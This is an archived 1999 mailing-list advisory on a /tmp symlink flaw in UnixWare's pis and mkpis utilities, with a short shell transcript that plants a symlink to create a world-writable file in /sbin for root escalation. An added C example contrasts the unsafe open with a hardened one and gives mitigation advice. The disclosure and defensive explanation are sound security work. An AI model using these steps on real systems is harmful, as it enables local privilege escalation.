Re: UnixWare local pis exploit (mkpis as well)
Subject: Re: UnixWare local pis exploit (mkpis as well)
From: Brock Tellier (btellier@USA.NET)
Date: Wed Dec 29 1999 - 10:58:26 CST
- Next message: Ussr Labs: "Local / Remote D.o.S Attack in CSM Mail Server for Windows 95/NT v.2000.08.A"
- Previous message: Henrik Edlund: "Re: majordomo local exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
As a bonus, /usr/local/bin/mkpis is vulnerable to the same /tmp symlink
problem. It has the same permissions as pis.
-Brock
--- Brock Tellier <btellier@USA.NET> wrote:

Greetings,

OVERVIEW

A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any user to create arbitrary files with group "sys" privileges. A full root compromise is then trivial.

BACKGROUND

As usual, I've only tested UnixWare 7.1.
DETAILS
By creating a symlink between /tmp/pisdata and any sys-owned file we can overwrite that file with ps output. If we point the symlink at a non-existent file in a directory which we can write to (such as, say, /sbin/ls), pis will create this file mode 666 owned by us, group of sys.
This is a fairly simple compromise. /sbin is writable by group sys. We can create files in /sbin owned by us. And root's default $PATH starts with /sbin.
EXPLOIT
bash-2.02$ ls -dal /sbin
drwxrwxr-x   2 root     sys         3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw-   1 xnec     sys         5896 Dec 28 08:28 /sbin/xnec
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
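The defect behind both pis and mkpis is the classic privileged-program-opens-a-fixed-/tmp-name pattern: open() follows whatever symlink an unprivileged user has planted there. The following is an added example, not code from Tellier's post and not the source of SCO's pis; the function names (unsafe_create_datafile, safe_create_datafile, run_demo) and the sandbox directory it builds under /tmp are assumptions for illustration. It places the naive open next to the hardened form (O_CREAT|O_EXCL|O_NOFOLLOW, restrictive mode, fstat of the descriptor actually obtained) and, inside a throw-away directory, shows that the naive open silently truncates a file behind a planted link while the hardened one refuses it and only creates a fresh 0600 regular file when no entry pre-exists.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical name: models the pattern the advisory describes, a privileged
 * program truncating/creating a predictable path. open() follows symlinks,
 * so a planted /tmp/pisdata -> /sbin/xnec link is honoured. */
int unsafe_create_datafile(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form (hypothetical name). O_EXCL refuses any pre-existing entry,
 * symlink or not; O_NOFOLLOW turns a symlink into an explicit error instead
 * of a follow; mode 0600 means nothing is created group- or world-writable.
 * fstat() on the descriptor confirms what was actually opened. */
int safe_create_datafile(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EEXIST;
        return -1;
    }
    return fd;
}

/* Builds a constructed sandbox under /tmp (never touches /sbin or /tmp/pisdata
 * itself) and returns a bitmask of what was observed:
 *   1 = naive open followed the link and truncated the "victim" file
 *   2 = hardened open refused the planted link
 *   4 = with the link gone, hardened open created a 0600 regular file
 * A fully expected run returns 7. */
int run_demo(void)
{
    char dir[] = "/tmp/pisdemoXXXXXX";          /* constructed sandbox */
    if (!mkdtemp(dir))
        return -1;
    char target[256], linkpath[256];
    snprintf(target, sizeof target, "%s/victim", dir);   /* stands in for /sbin/xnec */
    snprintf(linkpath, sizeof linkpath, "%s/pisdata", dir); /* stands in for /tmp/pisdata */

    int result = 0;
    int t = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (t < 0)
        goto out;
    ssize_t n = write(t, "important\n", 10);    /* give the victim some content */
    (void)n;
    close(t);
    if (symlink(target, linkpath) < 0)          /* the planted link */
        goto out;

    /* 1. Naive pattern: the link is followed and the victim is truncated. */
    int fd = unsafe_create_datafile(linkpath);
    if (fd >= 0) {
        struct stat st;
        if (fstat(fd, &st) == 0 && st.st_size == 0)
            result |= 1;
        close(fd);
    }

    /* 2. Hardened pattern: the pre-existing link is refused outright. */
    if (safe_create_datafile(linkpath) < 0 && (errno == EEXIST || errno == ELOOP))
        result |= 2;

    /* 3. Hardened pattern with no pre-existing entry: a fresh private file. */
    unlink(linkpath);
    fd = safe_create_datafile(linkpath);
    if (fd >= 0) {
        struct stat st;
        if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600)
            result |= 4;
        close(fd);
    }

out:
    unlink(linkpath);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_demo();
    printf("observed bitmask: %d (7 = naive followed link, hardened refused it, "
           "hardened created 0600 file)\n", r);
    return r == 7 ? 0 : 1;
}
```

The hardened open is the minimum fix for a program that must keep a fixed name; the better design is to avoid predictable names in a shared directory altogether (mkstemp() into a directory the program owns), and on the system side to make sure directories on root's PATH such as /sbin are not group-writable, since the advisory's escalation step depends entirely on that.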
This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 19:43:21 CST